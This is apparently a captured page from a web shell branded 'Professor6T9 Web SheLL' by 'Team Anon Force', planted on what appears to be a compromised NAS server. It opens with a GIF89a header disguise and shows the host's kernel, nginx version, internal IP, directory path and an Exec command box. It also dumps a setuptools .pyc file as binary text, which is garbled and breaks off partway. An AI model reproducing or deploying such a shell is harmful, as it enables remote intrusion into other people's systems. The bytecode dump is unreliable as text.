GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Contacts
/
radicale
/
site-packages
/
setuptools
/
command
/
__pycache__
[ HOME ]
Exec
Submit
File Name : setopt.cpython-38.pyc
U �}�h� � @ s� d dl mZ d dlmZ d dlmZ d dlZd dlZd dlZddlm Z ddl mZ dd d dgZdd d�Z ddd �ZG dd � d e �ZG dd� de�ZdS )� )�convert_path)�log)�DistutilsOptionErrorN� )�Command)�_cfg_read_utf8_with_fallback�config_file�edit_config�option_base�setopt�localc C sh | dkrdS | dkr,t j�t j�tj�d�S | dkrZt jdkrBdpDd}t j�td | ��S t d | ��dS )z�Get the filename of the distutils, local, global, or per-user config `kind` must be one of "local", "global", or "user" r z setup.cfg�globalz distutils.cfg�user�posix�.� z~/%spydistutils.cfgz7config_file() type must be 'local', 'global', or 'user'N) �os�path�join�dirname� distutils�__file__�name� expanduserr � ValueError)�kind�dot� r �@/tmp/pip-target-k_nuic9h/lib/python/setuptools/command/setopt.pyr s Fc C s2 t �d| � t�� }dd� |_t|| � |�� D ]�\}}|dkrZt �d|| � |�|� q0|� |�s|t �d|| � |� |� |�� D ]p\}}|dkr�t �d||| � |�||� |�|�s�t �d|| � |�|� q�t �d |||| � |� |||� q�q0t �d | � |�s.t| ddd ��}|�|� W 5 Q R X dS )aY Edit a configuration file to include `settings` `settings` is a dictionary of dictionaries or ``None`` values, keyed by command/section name. A ``None`` value means to delete the entire section, while a dictionary lists settings to be changed or deleted in that section. A setting of ``None`` means to delete that setting. zReading configuration from %sc S s | S �Nr )�xr r r �<lambda>'